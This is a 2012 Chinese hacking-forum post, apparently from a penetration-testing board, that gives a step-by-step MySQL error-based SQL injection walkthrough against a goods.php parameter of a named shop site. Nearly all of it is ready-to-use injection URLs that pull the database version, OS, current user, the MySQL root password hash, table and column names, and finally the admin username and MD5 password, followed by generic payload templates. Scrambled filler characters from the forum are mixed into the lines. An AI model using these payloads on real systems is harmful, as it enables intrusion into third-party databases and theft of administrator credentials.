中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]
作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
* f, ?7 v) f. fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 W: ^" i* ^5 z& r- h- y5 Y  w9 }# K' M! E: y, Z
判断系统: [$ x5 E8 b) B/ |; q4 y

: v/ L5 X$ D7 C# U5 ?; q5 P4 qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. o( W3 `3 X/ V. h4 I6 _  |, q( c& |! S: n$ U

' H! r6 G% Y+ M6 @5 z, T% r2 d3 ]6 t: k6 x0 Q
当前 user()3 t/ Q2 b5 z" S' r& ^8 s9 y

' t' n7 h! U* v8 k. H' P0 [3 P% u8 |: \( ^http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( t% e& x: W  c* D: G

: f5 L: [0 o* B  N7 ?: q& Q& t0 Z' m5 x9 f
* ]+ o; {, N$ V- v8 y7 m) M9 j
当前 database()
  ^6 f: k+ n5 t9 \! h9 N" C- Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* R* ~- E: H# R! Z/ D, H2 K; ?  D& f! s/ u1 G8 q
( L. M. M0 p( u/ z% T. J0 W! [

' k$ ]1 e8 P6 O9 |0 D2 k1 p! M8 }5 Z: U, u; ?. H6 b! y0 [
root hash  R) x& A$ H/ j6 N
& ?/ V; J- t3 K6 [" c# }4 W- l
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# H% [0 [( p. U. c, ?
1 ]$ j3 l; W$ N7 B
! z. f% |6 Z" c# s$ R( a; w8 j. X

# @" H+ B" y& k( O2 K. j8 r当前 数据库表名
. L# X5 A0 F# r% P3 q
3 ^0 O" }! }) E) i* Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! U* Q; u" U2 D( o
" J2 ]6 Q/ c' x# p, O4 y" j
; I, J+ t+ i' T  x& i
0 y8 R( f# }0 ?% F# X当前 数据库 user_name 字段# D, C: Z7 O: f& _
! P3 f3 V: M  l( @$ i
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 Y3 n, b9 U( m

1 L7 U  [! @) |& c/ Q  ^* P当前 数据库 字段 password7 k  @$ a0 P$ K* g+ V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 K! h- U9 p; F9 i* U& v' Q2 w1 y+ M' r- }- o2 ^6 B# X
' E8 A/ Q: ~) ?0 P2 M5 q

* m5 o4 [0 j# ]4 s" \获得 admin passwd(md5)
2 X2 V0 p: @, P& x8 `; n
  S% b" j! \  S4 Z+ a" k9 Y8 A, }0 Z, R" M6 ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. S6 M2 l; O( f& o. {0 u1 L
/ P: n# G+ ~9 m* X1 ^8 R. D( T1 D
报错注射
4 E: L! I) F: L* N: G) R! |SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)) r+ X+ l1 |$ |) ~& y7 d
3 G- m. h! d8 s
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)5 }0 v" O$ c; z) w: w# \( N

( A8 N0 w5 n3 s1 O# r; Xand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2